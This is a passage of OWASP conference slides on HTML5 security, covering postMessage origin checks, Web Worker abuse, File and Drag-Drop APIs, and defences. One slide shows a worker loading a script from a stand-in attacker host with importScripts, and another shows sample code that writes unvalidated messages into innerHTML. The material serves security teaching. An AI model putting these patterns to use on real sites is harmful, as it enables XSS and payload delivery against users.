  • 63. Web Messaging - Scenario If postMessage() is set to * so page can be loaded in iframe and messaging can be hijacked Also, origin is not set to fixed then again frame listen from any domian – again an issue Stream coming needs to be checked before innerHTML or eval() Iframe or Web Worker can glue two streams – same domain or cross domain OWASP 63
  • 64. Origin check OWASP 64
  • 65. Web Worker – Hacks! Web Workers allows threading into HTML pages using JavaScript No need to use JavaScript calls like setTimeout(), setInterval(), XMLHttpRequest, and event handlers Totally Async and well supported [initialize] var worker = new Worker('task.js'); [Messaging] worker.postMessage(); OWASP 65
  • 66. Web Worker – Hacks! Web Page Current DOM Web Worker XHR, Location, Navigator etc. JavaScript Runtime Browser Platform Background Thread on same Scope and Object – No DOM Access page - messaging Regex, Array, JSON etc… OWASP 66
  • 67. Web Worker – Hacks! Security issues It is not allowing to load cross domain worker scripts. (http:, https:,javascript:,data : -No) It has some typical issues  It allows the use of XHR. Hence, in-domain and CORS requests possible  It can cause DoS – if user get stream to run JavaScript in worker thread. Don’t have access to parent DOM though  Message validation needed – else DOM based XSS OWASP 67
  • 68. Web Worker – Hacks!  Exmaple <html> <button onclick="Read()">Read Last Message</button> <button onclick="stop()">Stop</button> <output id="result"></output> <script> function Read() { worker.postMessage({'cmd': 'read', 'msg': 'last'}); } function stop() { worker.postMessage({'cmd': 'stop', 'msg': 'stop it'}); alert("Worker stopped"); } var worker = new Worker('message.js'); worker.addEventListener('message', function(e) { document.getElementById('result').innerHTML = e.data; }, false); </script> </html> OWASP 68
  • 69. Web Workers – Hacks! Possible to cause XSS Running script Passing hidden payload Also, web workers can help in embedding silent running js file and can be controlled. Can be a tool for payload delivery and control within browser framework importScripts("http://evil.com/payload.js") – worker can run cross domain script OWASP 69
  • 70. Scan and Defend Scan and look for JavaScript scanning Messaging and Worker implementation DOM calls Use of eval(), document.* calls etc. Defense and Countermeasures Same origin listening is a must for messaging event Secure JavaScript coding OWASP 70
  • 71. APIs … HTML5 few other APIs are interesting from security standpoint File APIs – allows local file access and can mixed with ClickJacking and other attacks to gain client files. Drag-Drop APIs – exploiting self XSS and few other tricks, hijacking cookies …  Lot more to explore and defend… OWASP 71
  • 72. Resources/References http://www.html5rocks.com/en/ (Solid stuff) https://www.owasp.org/index.php/HTML5_Security _Cheat_Sheet (OWASP stuff) http://html5sec.org/ (Quick Cheat sheet) http://html5security.org/ (Good resources) http://blog.kotowicz.net/ (Interesting work) OWASP 72
  • 73. http://shreeraj.blogspot.com http://shreeraj.blogspot.com shreeraj@blueinfy.com shreeraj@blueinfy.com http://www.blueinfy.com http://www.blueinfy.com CONCLUSION AND QUESTIONS OWASP 73